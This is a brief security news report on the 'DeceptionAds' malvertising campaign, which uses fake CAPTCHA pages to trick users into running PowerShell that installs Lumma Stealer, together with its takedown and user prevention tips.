A sophisticated malvertising operation dubbed “DeceptionAds” has been discovered distributing the Lumma Stealer malware through deceptive CAPTCHA verification pages. The campaign, attributed to threat actor “Vane Viper,” generates over one million daily ad impressions across 3,000 websites using the Monetag advertising network.
Campaign Mechanics
The attack chain begins when users click on pop-up ads promoting fake offers or downloads. Through the BeMob cloaking service, victims are redirected to fraudulent CAPTCHA pages that secretly copy malicious PowerShell commands to their clipboard. Users are then instructed to paste these “CAPTCHA solutions” into the Windows Run dialog, unknowingly executing the Lumma Stealer malware.
Lumma Stealer Capabilities
This advanced information-stealing malware targets:
– Browser data (cookies, credentials, passwords)
– Credit card information
– Cryptocurrency wallets and private keys
– Sensitive text files and documents
– Browser history from Chrome, Edge, Firefox, and other browsers
Campaign Impact and Response
GuardioLabs’ investigation led to:
– Monetag removing 200 malicious accounts
– BeMob taking action to stop the campaign
– Campaign disruption, though attempts to resume operations through different networks were observed
Security Implications
The campaign represents an evolution of the “ClickFix” tactic, presenting a more dangerous threat by leveraging legitimate ad networks. Recent infostealer campaigns have led to significant breaches affecting major companies like Ticketmaster and AT&T.
Prevention Measures
Users should:
– Never execute commands prompted by websites
– Avoid pirated software and illegal streaming sites
– Be cautious of suspicious advertisements
– Implement robust security measures to prevent infostealer infections